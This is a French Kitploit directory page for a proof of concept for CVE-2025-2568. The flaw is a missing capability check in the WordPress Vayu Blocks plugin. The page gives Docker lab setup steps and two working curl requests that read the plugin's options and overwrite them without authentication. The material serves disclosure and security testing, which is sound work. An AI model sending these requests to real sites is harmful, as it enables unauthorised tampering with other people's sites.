Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PoC_CVE-2025-2568 — Preuve de concept pour CVE-2025-2568, démontrant un accès et une modification non autorisés des options du plugin WordPress Vayu Blocks via des contrôles de capacités manquants. | Kitploit
Outils/GitHubGitHub/shinigami-777/poc_cve-2025-2568
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubshinigami-777/poc_cve-2025-2568

PoC_CVE-2025-2568

Preuve de concept pour CVE-2025-2568, démontrant un accès et une modification non autorisés des options du plugin WordPress Vayu Blocks via des contrôles de capacités manquants.

Voir le dépôt
il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PoC CVE-2025-2568

Aperçu

Le plugin Vayu Blocks – Gutenberg Blocks pour WordPress & WooCommerce est vulnérable à un accès non autorisé et à une modification des données en raison de l'absence de vérifications des capacités sur les fonctions vayu_blocks_get_toggle_switch_values_callback et vayu_blocks_save_toggle_switch_callback dans les versions 1.0.4 à 1.2.1. Cela permet à des attaquants non authentifiés de lire les options du plugin et de mettre à jour toute option dont le nom de clé se termine par _value.

Étapes d'exploitation

Configuration (avec docker)

  1. Clonez le dépôt et suivez les étapes :
    root@kitploit:~
cd vuln-wordpress docker-compose up -d
  • Décompressez le plugin Vayu dans le dossier wp-content/plugins.
    root@kitploit:~
    cd wp-content/plugins/
    unzip vayu-blocks.1.2.0.zip
    
    Le plugin Vayu-blocks (version 1.2.0) est maintenant installé.
  • Exploitation :

    1. Utilisez ceci pour lire les options :
      root@kitploit:~
      curl http://localhost:8080/wp-json/vayu-blocks/v1/get-toggle-values/
      
    2. Envoyez une requête POST comme celle-ci pour modifier les valeurs des options.
      root@kitploit:~
      curl -X POST http://localhost:8080/wp-json/vayu-blocks/v1/save-toggle-switch \
       -H "Content-Type: application/json" \
       -d '{"key":"container", "value":"new_value"}'
      

    Vidéo d'exploitation

    wordpressexploit.webm

    Télécharger l’outil